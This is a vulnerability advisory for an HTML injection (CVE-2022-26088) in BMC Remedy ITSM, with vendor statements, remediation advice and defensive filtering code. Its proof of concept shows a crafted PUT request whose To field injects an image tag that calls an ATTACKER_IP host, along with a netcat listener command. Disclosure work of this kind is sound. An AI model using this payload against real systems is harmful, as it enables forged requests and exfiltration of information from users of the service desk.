CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite

An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the “number of recipients” field. NOTE: the vendor’s position is that “no real impact is demonstrated.”


The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the “To” field of the mail editor. Afterwards, the activity log of the incident shows that it was forwarded to <X> recipients. By clicking on the number of recipients, the injected HTML is loaded and executed.

Vendor description

“Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model.”

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

Business recommendation

The vendor provides an updated version which should be installed immediately.

The vendor states that:

  1. We have done hardening in version 22.1.
  2. However, we do not agree with assigning the CVE to this vulnerability.
  3. As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.

Vulnerability overview/description

1) HTML Injection (CVE-2022-26088)

An authenticated attacker who can forward incidents via email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the “To:” field of the email. A filtering mechanism prevents the injection of many HTML tags, for example <script>, and also removes event handlers. However, an attacker is still able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary “src” attribute, an attacker can force the user’s browser to make requests to a URL of the attacker’s choosing. This can be used to trigger actions on internal services via CSRF or exfiltrate information.
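As an added illustration (not code from the advisory or from BMC), the following Python contrasts the denylist style of filtering described above, which strips <script> blocks and event handlers yet lets an <img> tag through, with an allowlist that accepts the To field only as a list of plain addresses and HTML-escapes every value before it reaches the activity log. Both functions are my own stand-ins; the product's actual filter and validation rules are not on the page.

```python
import html
import re

# Conservative allowlist for one recipient address (assumption: a stand-in,
# not the product's own validation rule).
_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def denylist_filter(value: str) -> str:
    """Mimics the kind of filter the advisory describes: removes <script>
    blocks and on* event handlers, but leaves every other tag intact, so an
    <img src=...> survives. Included only to show why this is insufficient."""
    value = re.sub(r"(?is)<script.*?</script>", "", value)
    value = re.sub(
        r"""(?i)\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", "", value
    )
    return value


def validate_recipients(field: str) -> list[str]:
    """Allowlist approach: the To field must parse as a comma- or
    semicolon-separated list of plain addresses; anything else is rejected
    outright instead of being partially cleaned."""
    addrs = [a.strip() for a in re.split(r"[;,]", field) if a.strip()]
    if not addrs:
        raise ValueError("no recipients")
    for addr in addrs:
        if not _ADDR.match(addr):
            raise ValueError(f"invalid recipient: {addr!r}")
    return addrs


def activity_log_entry(user: str, recipients: list[str]) -> str:
    """Render the activity-log line with every user-controlled value
    HTML-escaped, so nothing in it is interpreted as markup when viewed."""
    names = ", ".join(html.escape(r, quote=True) for r in recipients)
    return (
        f"{html.escape(user, quote=True)} sent an email to "
        f"{len(recipients)} recipient(s): {names}"
    )
```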

Proof of concept

1) HTML Injection (CVE-2022-26088)

When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing the ‘Email.To.InternetEmail’ parameter. The modified request is:

PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
Host: TARGET
Cookie: […]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Xsrf-Token: SOME_TOKEN
Content-Length: ADAPT_AS_NEEDED
Te: trailers
Connection: close

{
  "worknote": "pentest",
  "access": true,
  "Email.From.Person": {
    "email": "SOME_SENDING_MAIL",
    "fullName": "Pentest - SEC Consult",
    "loginId": "USERNAME"
  },
  "Email.Subject": "SOME_SUBJECT",
  "Email.Body": "test2",
  "Email.To.InternetEmail": "<img src=http://ATTACKER_IP:8001/>[email protected]",
  "workInfoType": 16000
}

The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:

"<img src=http://LOCAL_IP:8001/>[email protected]"

The trailing [email protected] is needed to pass the email validation step, and the example.test domain was used to prevent sending out real emails. After this step, an entry stating that $USER has sent an email to 1 recipient is appended to the activity log of this incident.

Now we start a local netcat listener with the command:

$ nc -vnlp 8001

Now we click on the number ‘1’ in the activity log and see that the browser issues a request to our netcat listener. This confirms that the browser tries to load the image from the specified URL.

Vulnerable / tested versions

The following version has been tested:

  • 9.1.10 (corresponds to version 20.02, as stated at https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping)

Vendor contact timeline

Solution

Upgrade to version 22.1 or later which can be downloaded at the vendor’s page:

https://www.bmc.com/support/resources/product-downloads.html

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger / @2022

